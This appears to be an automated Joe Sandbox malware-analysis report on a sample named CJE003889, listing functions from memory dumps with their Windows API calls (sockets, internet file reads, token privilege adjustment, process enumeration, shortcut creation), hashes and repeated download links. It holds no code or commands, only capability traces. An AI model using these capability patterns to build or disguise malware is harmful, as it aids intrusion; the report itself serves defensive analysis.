Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 45969fb5413bd5e9fcb6ae9df51b45b5896279f15ff7cb86260266eaba8607c3
Instruction ID: 7d539602d2d445987b341864ceaf71ea03b776ac1f9094f356c03788d031c290
Opcode Fuzzy Hash: 45969fb5413bd5e9fcb6ae9df51b45b5896279f15ff7cb86260266eaba8607c3
Instruction Fuzzy Hash: 2141B175A00214AFEB20AF648CC6F6E77E8DF49754F04855DFA16AB3C2CA709D01A791

Function 00CE5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00CE53C5
IsWindowEnabled.USER32 ref: 00CE53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00CE53E0
IsIconic.USER32 ref: 00CE53EE
IsZoomed.USER32 ref: 00CE53FC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 436ca8636684032c98c9d55f8304c0d0903990b5ac757f285bbc6cf76166530e
Instruction ID: b5f02065aa8b224f6e50f842500e4e307918010db902cff4a41e7c85d3441689
Opcode Fuzzy Hash: 436ca8636684032c98c9d55f8304c0d0903990b5ac757f285bbc6cf76166530e
Instruction Fuzzy Hash: DD11C4717019916FDB215F27DC84B6EBB9CFF447A5B404428F846D7291CBB0DD428AA4

Function 00CB80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CB80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CB80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CB80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CB80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CB80F6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0b79a6a751ee2ef5ffd56c89baa29e69028f5f3cb91fd6cea2c744e3b4374823
Instruction ID: a3b3bbb1025e425791d6eb47fef03aa35ed466ec3f01c2cc5c69a48722d8a982
Opcode Fuzzy Hash: 0b79a6a751ee2ef5ffd56c89baa29e69028f5f3cb91fd6cea2c744e3b4374823
Instruction Fuzzy Hash: 78F06831241344AFD7104F65DCCDFAF3BACEF85755F000029F545C6150CB619D46DA60

Function 00CCC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CCC432
CoCreateInstance.OLE32(00CF2D6C,00000000,00000001,00CF2BDC,?), ref: 00CCC44A

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

CoUninitialize.OLE32 ref: 00CCC6B7

Strings

.lnk, xrefs: 00CCC3C6, 00CCC3EE, 00CCC3F8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: ea27080fa7e4d8f8a84ee76b5c36153a7628fdd8b819c3fecb8df0e5a5f1b399
Instruction ID: 06719d70734670fe2a044ad0513d79655846f89345949a83527b5213227f6f55
Opcode Fuzzy Hash: ea27080fa7e4d8f8a84ee76b5c36153a7628fdd8b819c3fecb8df0e5a5f1b399
Instruction Fuzzy Hash: 6EA11AB1104205AFD710EF54C8D1EAFB7ECEF99354F004A2CF1959B192DB71AA4ACB62

Function 00C64B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C64AD0), ref: 00C64B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C64B57

Strings

kernel32.dll, xrefs: 00C64B40
GetNativeSystemInfo, xrefs: 00C64B51

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: cd04800670f355ab96984234f17bd6f981046ace688aa39e6065ba185bb8e83d
Instruction ID: 692a362ada592880a11a1e6bae20cbd128f950823adb1db62035ac5ec1efe680
Opcode Fuzzy Hash: cd04800670f355ab96984234f17bd6f981046ace688aa39e6065ba185bb8e83d
Instruction Fuzzy Hash: 2BD05E35A10B57CFD7309F32ECA8B0A76E4AF86391B11C83ED496DA150E770E881CA58

Function 00C73030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 6bb9fc472d09262efaa6bab1ce9f6e320e22e2fbcca41eaa8bd9ca47aac995ef
Instruction ID: 470f81972c213190002871dd66df2ddb25e3c5e54e8c07393474b6218040b33b
Opcode Fuzzy Hash: 6bb9fc472d09262efaa6bab1ce9f6e320e22e2fbcca41eaa8bd9ca47aac995ef
Instruction Fuzzy Hash: C722BA716083419FC724DF24C881BAFB7E4EF85314F14892DF89A97291DB71EA09DB92

Function 00CDEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00CDEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00CDEE4B

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Process32NextW.KERNEL32(00000000,?), ref: 00CDEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CDEF1A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 884a576d972e89d5bd27f6d809b104589ab7db3806cfdbca2fcbd6a68006bcad
Instruction ID: 0c538fb699cd775ef80e30dceba4f153b10e3b5e461999b39d012966b3ea5da3
Opcode Fuzzy Hash: 884a576d972e89d5bd27f6d809b104589ab7db3806cfdbca2fcbd6a68006bcad
Instruction Fuzzy Hash: 81519C71108301AFD320EF20C882E6FB7E8EF98700F50492DF595972A1EB30A909DB92

Function 00CBE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00CBE628

Strings

(, xrefs: 00CBE66E
|, xrefs: 00CBE658

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: d5b025d49006e4e44ad59505af0980239ca9b69d05b81237b8baa5dfe3da7be9
Instruction ID: 1b76a62e194e715900bcf819526b9a368ef8446b2ac9ec418c421a0bf52f8397
Opcode Fuzzy Hash: d5b025d49006e4e44ad59505af0980239ca9b69d05b81237b8baa5dfe3da7be9
Instruction Fuzzy Hash: 00323575A007059FDB28DF59C4819AAB7F0FF48710F11C46EE8AADB3A1EB70A941CB44

Function 00CD22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CD180A,00000000), ref: 00CD23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00CD2418

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 666efb043e938793006d8359d23a56621b6cc359bcd377358211b3746f1f0b6f
Instruction ID: 304eb0f8dd521374ddc0e7c4628b10fa99ea2e7a4f5c581af01e9ed973c754a4
Opcode Fuzzy Hash: 666efb043e938793006d8359d23a56621b6cc359bcd377358211b3746f1f0b6f
Instruction Fuzzy Hash: C041D371904209BFEB20DE95DC85FBBB7ACEB50324F10402FFB51A6350DBB59E41A660

Function 00CCB3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00CCB40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00CCB465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00CCB4B2

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 168d830f67780c20121887fa5650dfe10b765cb27f4cf0c7c47daf716d9a2ebf
Instruction ID: b34a9850b0a3f83b556133a249726123a9393f60c5150c8f81c838a2759a2ed6
Opcode Fuzzy Hash: 168d830f67780c20121887fa5650dfe10b765cb27f4cf0c7c47daf716d9a2ebf
Instruction Fuzzy Hash: A3215C75A00508EFCB00EFA5D8C1EEDBBB8FF49310F1480A9E905AB361CB319956DB51

Function 00CB87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CB882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CB8858
GetLastError.KERNEL32 ref: 00CB8865

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 849f7108397b15b8f18a9e30facf20c312da0927814151e512343b0ee5535df8
Instruction ID: 408370c1658d0deee5da393af62e43474114f6f2761e4328e7887e0b663db64d
Opcode Fuzzy Hash: 849f7108397b15b8f18a9e30facf20c312da0927814151e512343b0ee5535df8
Instruction Fuzzy Hash: 8F119AB2804204AFE718EFA4DCC5E6BB7ADEB44314B20852EF49687251EA71AC05CB60

Function 00CB874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CB8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00CB878B
FreeSid.ADVAPI32(?), ref: 00CB879B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 6ac79da919ad3ab816d49aff0848c4e32c51fee5ece98a34083d19cfb8b45786
Instruction ID: d29d2d1521c3a02996f44b586b00a2fb402286d5d9bbbb8dfa16894f2a3b23a4
Opcode Fuzzy Hash: 6ac79da919ad3ab816d49aff0848c4e32c51fee5ece98a34083d19cfb8b45786
Instruction Fuzzy Hash: 03F04975A1130CBFDF00DFF4DC89AAEBBBCEF08211F1044A9A901E6181E7756A048B50

Function 00CCC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00CCC6FB
FindClose.KERNEL32(00000000), ref: 00CCC72B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: da206087183914885dbb3f224d51af8f70d35b898de4ca87473767d523799665
Instruction ID: 6627914b0ed05c80c1b54d00ab83624a689d8af2fd3377f652b60cc9a8f13204
Opcode Fuzzy Hash: da206087183914885dbb3f224d51af8f70d35b898de4ca87473767d523799665
Instruction Fuzzy Hash: 431161726006049FDB10DF29D885A6AF7E9FF89324F00851DF9A9DB2A1DB30AD05DF81

Function 00CCA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00CD9468,?,00CEFB84,?), ref: 00CCA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00CD9468,?,00CEFB84,?), ref: 00CCA0A9

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 1aac85b619e69ff0f7d4aa16e7b5336e2dd7ab8ade951bcdf8b395df2298b0a3
Instruction ID: ee0b2685773ffd43366627d51595181798011b0f652df01b504a24a9de0a1ed2
Opcode Fuzzy Hash: 1aac85b619e69ff0f7d4aa16e7b5336e2dd7ab8ade951bcdf8b395df2298b0a3
Instruction Fuzzy Hash: FAF0823510522DABDB219FA4CC89FEE776CFF08361F00426AF919D6191D6309A40CBA1

Function 00CB81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CB8309), ref: 00CB81E0
CloseHandle.KERNEL32(?,?,00CB8309), ref: 00CB81F2

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 7c3583ea3e9f85065c004b72ef5876f731ea3948cb2576f9c12d2dda3a711172
Instruction ID: 75b9dc63d6e6678f5f8f6aba7e5b0c9a81ac25c4d0929f24790ea7cb3d0da359
Opcode Fuzzy Hash: 7c3583ea3e9f85065c004b72ef5876f731ea3948cb2576f9c12d2dda3a711172
Instruction Fuzzy Hash: BEE08631001510AFE7212B20EC04E7777EDEF00314B20882DF4A584470CB615C91DB10

Function 00C8A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C88D57,?,?,?,00000001), ref: 00C8A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C8A163

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7fd5fcacbec40c52056d1f5504c63166fcef3e382a7198bfdfaea0487a575fa2
Instruction ID: b0bbc6472662c072399ecb737fea29a90e2be6b771c17d997282b4d2dd51b453
Opcode Fuzzy Hash: 7fd5fcacbec40c52056d1f5504c63166fcef3e382a7198bfdfaea0487a575fa2
Instruction Fuzzy Hash: EDB09231054248ABCA002B91EC49B8C3F68EB44AA2F405024F60D88474CB6255528A91

Function 00C8F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ede2aa2ecb92a152933244927759da3ec241c3665f2a72df695d46645d2fea24
Instruction ID: bcd27ee5e098cf5fade909c39598d3388fd10f4e993c012a117509e96f9adbab
Opcode Fuzzy Hash: ede2aa2ecb92a152933244927759da3ec241c3665f2a72df695d46645d2fea24
Instruction Fuzzy Hash: 48322A31D29F014ED7236634D832339A249AFB73C8F15D73BF829B59A5EB28C5838205

Function 00C9242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5116b5e13309fdb91e408ed65eb114c66d1716dce3748fdcdb9f7bfded894867
Instruction ID: 5096970ce7c364e546f5df79165d2653640b101f6fa706c748fddef0556e472e
Opcode Fuzzy Hash: 5116b5e13309fdb91e408ed65eb114c66d1716dce3748fdcdb9f7bfded894867
Instruction Fuzzy Hash: 45B10261D2AF404DD7239639883533AFA5CAFBB2C5F52D71BFC5A70D62EB2185838142

Function 00CC8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00CC889B

Part of subcall function 00C8520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CC8F6E,00000000,?,?,?,?,00CC911F,00000000,?), ref: 00C85213
Part of subcall function 00C8520A: __aulldiv.LIBCMT ref: 00C85233

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: f074719c1ef68f1d900b6f11dcb7d50640780c73865d8237a63ccbdacbc534e0
